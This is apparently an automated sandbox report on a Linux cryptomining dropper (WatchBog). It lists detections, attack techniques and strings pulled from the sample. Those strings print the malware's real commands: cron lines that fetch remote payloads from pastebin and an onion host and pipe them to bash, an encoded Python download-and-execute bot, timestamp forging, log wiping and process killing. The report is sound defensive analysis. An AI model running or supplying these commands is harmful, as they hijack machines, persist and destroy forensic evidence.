Loading ...

Play interactive tourEdit tour

Analysis Report AEjyioBcTB

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:922045
Start date:25.07.2019
Start time:13:45:31
Joe Sandbox Product:Cloud
Overall analysis duration:0h 12m 15s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:AEjyioBcTB
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection:MAL
Classification:mal96.spre.troj.expl.evad.mine.lin@0/19@14/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 91.189.92.41, 91.189.92.19, 91.189.92.20, 91.189.92.38
  • Excluded domains from analysis (whitelisted): api.snapcraft.io

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold960 - 100Report FP / FNfalsemalicious

Key Signatures

Malicious sample detected (through community Yara rule)Show sources
Yara detected Linux WatchBogShow sources

Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsLocal Job Scheduling11Local Job Scheduling11Port MonitorsWeb Service1Credential DumpingNetwork Service Scanning1Exploitation of Remote Services1Data from Local SystemData Encrypted1Web Service1
Replication Through Removable MediaCommand-Line Interface1Hidden Files and Directories1Accessibility FeaturesMasquerading1Network SniffingProcess Discovery1Remote Desktop Protocol1Data from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1
Drive-by CompromiseScripting1Accessibility FeaturesPath InterceptionHidden Files and Directories1Input CaptureSecurity Software Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol2
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingFile Permissions Modification1Credentials in FilesSystem Information Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol12
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessTimestomp1Account ManipulationRemote System DiscoveryShared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceScripting1Brute ForceSystem Owner/User DiscoveryThird-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskFile Deletion1Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port

Signature Overview

Click to jump to signature section


Exploits:

barindex
Yara detected Linux WatchBogShow sources
Source: Yara matchFile source: AEjyioBcTB, type: SAMPLE

Bitcoin Miner:

barindex
Yara detected Linux WatchBogShow sources
Source: Yara matchFile source: AEjyioBcTB, type: SAMPLE
Detected Stratum mining protocolShow sources
Source: global trafficTCP traffic: 192.168.1.100:60262 -> 37.59.54.205:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 37 6b 32 77 64 6e 79 79 42 6f 4d 54 36 4e 39 68 6f 35 59 37 75 51 67 31 4a 36 67 50 73 54 62 6f 4b 50 36 4a 58 66 42 35 6d 73 66 33 6a 55 55 76 54 66 45 63 65 4b 35 55 37 4b 4c 6e 57 69 72 35 56 5a 50 4b 67 55 56 78 70 6b 58 6e 4a 4c 6d 69 6a 61 75 33 56 5a 38 44 32 7a 73 79 4c 37 2e 6f 6c 64 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 32 2e 31 34 2e 31 20 28 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 6c 69 62 75 76 2f 31 2e 32 34 2e 31 20 67 63 63 2f 35 2e 34 2e 30 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 77 6f 77 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 31 22 2c 22 63 6e 2f 30 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 74 6c 22 2c 22 63 6e 2f 6d 73 72 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6
Found strings related to Crypto-MiningShow sources
Source: xmrig-notls.149.drString found in binary or memory: stratum+tcp://
Source: AEjyioBcTBString found in binary or memory: rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
Source: config.json.140.drString found in binary or memory: "algo": "cryptonight",
Source: xmrig-notls.149.drString found in binary or memory: -o, --url=URL URL of mining server
Source: xmrig-notls.149.drString found in binary or memory: stratum+tcp://
Source: AEjyioBcTBString found in binary or memory: rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls"
Source: xmrig-notls.149.drString found in binary or memory: Usage: xmrig [OPTIONS]
Source: config.json.140.drString found in binary or memory: "url": "pool.minexmr.com:80",
Stdout / stderr contain strings indicative of a mining clientShow sources
Source: bash "/tmp/AEjyioBcTB"Stdout: xmrig
Reads CPU information from /sys indicative of miner or evasive malwareShow sources
Source: ./watchbog (PID: 19753)Reads CPU info from /sys: /sys/devices/system/cpu/online

Spreading:

barindex
Found strings indicative of a multi-platform dropperShow sources
Source: AEjyioBcTBString: echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
Source: AEjyioBcTBString: (curl -fsSL $room||wget -q -O - $room) > /bin/ftpsdns
Source: AEjyioBcTBString: key=$( (curl -fsSL $house||wget -q -O - $house) )
Source: AEjyioBcTBString: echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
Source: AEjyioBcTBString: echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
Source: AEjyioBcTBString: echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
Source: AEjyioBcTBString: echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
Source: AEjyioBcTBString: echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
Source: AEjyioBcTBString: (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab -
Source: AEjyioBcTBString: pay="(curl -fsSL $house||wget -q -O- $house||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash"
Source: AEjyioBcTBString: (curl -fsSL $tar_url -o $tar_out||wget -q $tar_url -O $tar_out)
Source: AEjyioBcTBString: (curl -fsSL $file_url|| wget -q -O - $file_url)| base64 -d > $file_out
Source: AEjyioBcTBString: (curl -fsSL $deep || wget -q -O - $deep)
Source: AEjyioBcTBString: (curl -fsSL $surf || wget -q -O - $surf)
Source: AEjyioBcTBString: update=$( (curl -fsSL $info|| wget -q -O - $info) )
Source: apache.4.drString: */7 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: httpntp.4.drString: (python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: oanacroane.4.drString: (curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash
Source: root.4.drString: */3 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: root0.4.drString: */9 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: root1.4.drString: */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: system.4.drString: */6 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash

Networking:

barindex
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: pastebin.com
Urls found in memory or binary dataShow sources
Source: system.4.drString found in binary or memory: https://aziplcr72qjhzvin.onion.to/old.txt
Source: system.4.drString found in binary or memory: https://pastebin.com/raw/3FDDiNwW
Source: apache.4.dr, httpntp.4.dr, root.4.dr, root0.4.dr, root1.4.dr, system.4.drString found in binary or memory: https://pastebin.com/raw/4HvzGfGm
Source: system.4.drString found in binary or memory: https://pastebin.com/raw/EzqVke6X
Source: oanacroane.4.drString found in binary or memory: https://pastebin.com/raw/KJcZ9HLL
Source: oanacroane.4.drString found in binary or memory: https://pastebin.com/raw/KJcZ9HLL)
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 55366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55378
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55368
Source: unknownNetwork traffic detected: HTTP traffic on port 55378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55370
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54582
Source: unknownNetwork traffic detected: HTTP traffic on port 55368 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54582 -> 443

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, type: DROPPEDMatched rule: Detects Monero mining software
Contains symbols with names commonly found in malwareShow sources
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction0
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction1
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction10
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction100
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction101
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction102
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction103
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction104
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction105
Source: ELF static info symbol of initial sampleName: CryptonightR_instruction106
Sample contains strings that are potentially command stringsShow sources
Source: Initial samplePotential command found: echo $ver
Source: Initial samplePotential command found: chattr -i /etc/crontab
Source: Initial samplePotential command found: rm -rf /bin/httpntp /bin/ftpsdns
Source: Initial samplePotential command found: sed -i '/httpntp/d' /etc/crontab
Source: Initial samplePotential command found: sed -i '/ftpsdns/d' /etc/crontab
Source: Initial samplePotential command found: echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
Source: Initial samplePotential command found: chmod 755 /bin/httpntp
Source: Initial samplePotential command found: echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
Source: Initial samplePotential command found: echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
Source: Initial samplePotential command found: chmod 755 /bin/ftpsdns
Source: Initial samplePotential command found: echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
Source: Initial samplePotential command found: echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/crontab
Source: Initial samplePotential command found: nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKI3NpbXBsZSBodHRwX2JvdAppbXBvcnQgdXJsbGliCmltcG9ydCBiYXNlNjQKaW1wb3J0IG9zCgpkZWYgc29zKCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzA1cDBmVFlkJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBmID0gb3MucG9wZW4oc3RyKHBhZ2UpKQogICAgZXhjZXB0OgogICAgICAgIHByaW50KCdmYWlsZWQgdG8gZXhlY3V0ZSBvcyBjb21tYW5kJykKICAgICAgICBwYXNzCgpkZWYgcnVuU2NyaXB0KCk6CiAgICB1cmwgPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0t4V1BGZUVuJwogICAgdHJ5OgogICAgICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3Blbih1cmwpLnJlYWQoKSkKICAgICAgICBleGVjKHBhZ2UpCiAgICBleGNlcHQ6CiAgICAgICAgcHJpbnQoJ2ZhaWxlZCB0byBleGVjdXRlIG9zIHB5dGhvbiBzY3JpcHQnKQogICAgICAgIHBhc3MKCmQ9ICdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvWDZ3dnV2OTgnCnRyeToKICAgIHBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIudXJsb3BlbihkKS5yZWFkKCkpCiAgICBpZiBwYWdlID09ICdvcyc6CiAgICAgICAgc29zKCkKICAgIGVsaWYgcGFnZSA9PSAnc2NyaXB0JzoKICAgICAgICBydW5TY3JpcHQoKQogICAgZWxzZToKICAgICAgICBwcmlud
Source: Initial samplePotential command found: touch /tmp/.tmpk
Source: Initial samplePotential command found: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
Source: Initial samplePotential command found: rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
Source: Initial samplePotential command found: mkdir -p /var/spool/cron/crontabs
Source: Initial samplePotential command found: mkdir -p /etc/cron.hourly
Source: Initial samplePotential command found: mkdir -p /etc/cron.daily
Source: Initial samplePotential command found: mkdir -p /etc/cron.monthly
Source: Initial samplePotential command found: sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root
Source: Initial samplePotential command found: sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache
Source: Initial samplePotential command found: sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system
Source: Initial samplePotential command found: sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root
Source: Initial samplePotential command found: sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root
Source: Initial samplePotential command found: echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
Source: Initial samplePotential command found: echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
Source: Initial samplePotential command found: echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
Source: Initial samplePotential command found: echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
Source: Initial samplePotential command found: echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
Source: Initial samplePotential command found: echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
Source: Initial samplePotential command found: echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
Source: Initial samplePotential command found: echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
Source: Initial samplePotential command found: touch -acmr /bin/sh /var/spool/cron/root
Source: Initial samplePotential command found: touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.d/system
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.d/apache
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.d/root
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: Initial samplePotential command found: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Source: Initial samplePotential command found: crontab -r
Source: Initial samplePotential command found: echo " "
Source: Initial samplePotential command found: echo "cron okay"
Source: Initial samplePotential command found: echo "Setting up atd backup"
Source: Initial samplePotential command found: echo "$pay" | at -m now + 1 minute
Source: Initial samplePotential command found: echo "Setting up custom backup"
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/
Source: Initial samplePotential command found: nohup ./crun >/dev/null 2>&1 &
Source: Initial samplePotential command found: sleep 15
Source: Initial samplePotential command found: rm /tmp/crun
Source: Initial samplePotential command found: mkdir -p $temp_path/dataoutput/
Source: Initial samplePotential command found: cd $temp_path
Source: Initial samplePotential command found: tar $tar_flag $tar_out -C $temp_path/dataoutput/
Source: Initial samplePotential command found: mv $rig_path $output
Source: Initial samplePotential command found: cd $base_path
Source: Initial samplePotential command found: rm -rf $temp_path
Source: Initial samplePotential command found: mkdir -p $path
Source: Initial samplePotential command found: rm -rf $path/*
Source: Initial samplePotential command found: chattr -i $path/*
Source: Initial samplePotential command found: rm -rf $path/config.json $path/watchbog
Source: Initial samplePotential command found: cd $path
Source: Initial samplePotential command found: chmod 777 $path/watchbog
Source: Initial samplePotential command found: nohup ./watchbog >/dev/null 2>&1 &
Source: Initial samplePotential command found: rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
Source: Initial samplePotential command found: chmod 777 $path/config.txt
Source: Initial samplePotential command found: chmod 777 $path/cpu.txt
Source: Initial samplePotential command found: chmod 777 $path/pools.txt
Source: Initial samplePotential command found: rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
Source: Initial samplePotential command found: touch /tmp/.tmpc
Source: Initial samplePotential command found: echo "An update exists boss"
Source: Initial samplePotential command found: echo "NO update exists boss"
Source: Initial samplePotential command found: ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
Source: Initial samplePotential command found: ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid; done
Source: Initial samplePotential command found: pkill -f watchbog
Source: Initial samplePotential command found: echo "$check file exist"
Source: Initial samplePotential command found: echo "cleaning up file $check"
Source: Initial samplePotential command found: rm -rf $check
Source: Initial samplePotential command found: echo "I am $me"
Source: Initial samplePotential command found: echo "It's running boss"
Source: Initial samplePotential command found: crontab -r
Source: Initial samplePotential command found: echo "Setting Up Sys Cron"
Source: Initial samplePotential command found: sleep 30
Source: Initial samplePotential command found: echo 0>/var/spool/mail/root
Source: Initial samplePotential command found: echo 0>/var/log/wtmp
Source: Initial samplePotential command found: echo 0>/var/log/secure
Source: Initial samplePotential command found: echo 0>/var/log/cron
Source: Initial samplePotential command found: sed -i '/pastebin/d' /var/log/syslog
Source: Initial samplePotential command found: sed -i '/github/d' /var/log/syslog
Source: Initial samplePotential command found: touch /tmp/.tmplassstgggzzzqpppppp12233333
Source: Initial samplePotential command found: echo "KGN1cmwgLWZzU0xrIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9XMVlrcnFIa3x8d2dldCAtcSAtTyAtIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9XMVlrcnFIayl8YmFzaAo="|base64 -d|bash
Yara signature matchShow sources
Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, type: DROPPEDMatched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = https://creativecommons.org/licenses/by-nc/4.0/
Classification labelShow sources
Source: classification engineClassification label: mal96.spre.troj.expl.evad.mine.lin@0/19@14/0

Persistence and Installation Behavior:

barindex
Explicitly modifies time stamps using the "touch" commandShow sources
Source: /bin/bash (PID: 19363)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 19494)Touch executable uses timestamp modification options: touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 19495)Touch executable uses timestamp modification options: touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19496)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/system
Source: /bin/bash (PID: 19497)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 19498)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 19500)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19503)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19507)Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Sample tries to persist itself using cronShow sources
Source: /bin/bash (PID: 19147)File: /etc/crontab
Source: /bin/bash (PID: 19147)File: /etc/cron.d/root
Source: /bin/bash (PID: 19147)File: /etc/cron.d/system
Source: /bin/bash (PID: 19147)File: /etc/cron.d/apache
Source: /bin/bash (PID: 19147)File: /var/spool/cron/root
Source: /bin/bash (PID: 19147)File: /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19147)File: /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19147)File: /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19147)File: /etc/cron.monthly/oanacroane
Source: /bin/sed (PID: 19308)File: /etc/crontab
Source: /bin/sed (PID: 19310)File: /etc/crontab
Sets full permissions to files and/or directoriesShow sources
Source: /bin/bash (PID: 19749)Chmod executable with 777: /bin/chmod -> chmod 777 /bin/watchbog
Creates hidden files and/or directoriesShow sources
Source: /bin/mkdir (PID: 19689)Directory: .tmpdropoff
Enumerates processes within the "proc" file systemShow sources
Source: /bin/ps (PID: 19522)File opened: /proc/17960/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17960/status
Source: /bin/ps (PID: 19522)File opened: /proc/17960/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17560/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17560/status
Source: /bin/ps (PID: 19522)File opened: /proc/17560/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/18013/stat
Source: /bin/ps (PID: 19522)File opened: /proc/18013/status
Source: /bin/ps (PID: 19522)File opened: /proc/18013/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/2396/stat
Source: /bin/ps (PID: 19522)File opened: /proc/2396/status
Source: /bin/ps (PID: 19522)File opened: /proc/2396/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/1180/stat
Source: /bin/ps (PID: 19522)File opened: /proc/1180/status
Source: /bin/ps (PID: 19522)File opened: /proc/1180/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/18018/stat
Source: /bin/ps (PID: 19522)File opened: /proc/18018/status
Source: /bin/ps (PID: 19522)File opened: /proc/18018/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/2308/stat
Source: /bin/ps (PID: 19522)File opened: /proc/2308/status
Source: /bin/ps (PID: 19522)File opened: /proc/2308/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/17965/stat
Source: /bin/ps (PID: 19522)File opened: /proc/17965/status
Source: /bin/ps (PID: 19522)File opened: /proc/17965/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/10/stat
Source: /bin/ps (PID: 19522)File opened: /proc/10/status
Source: /bin/ps (PID: 19522)File opened: /proc/10/cmdline
Source: /bin/ps (PID: 19522)File opened: /proc/11/stat
Source: /bin/ps (PID: 19522)File opened: /proc/11/status
Source: /bin/ps (PID: 19522)File opened: /proc/11/cmdline
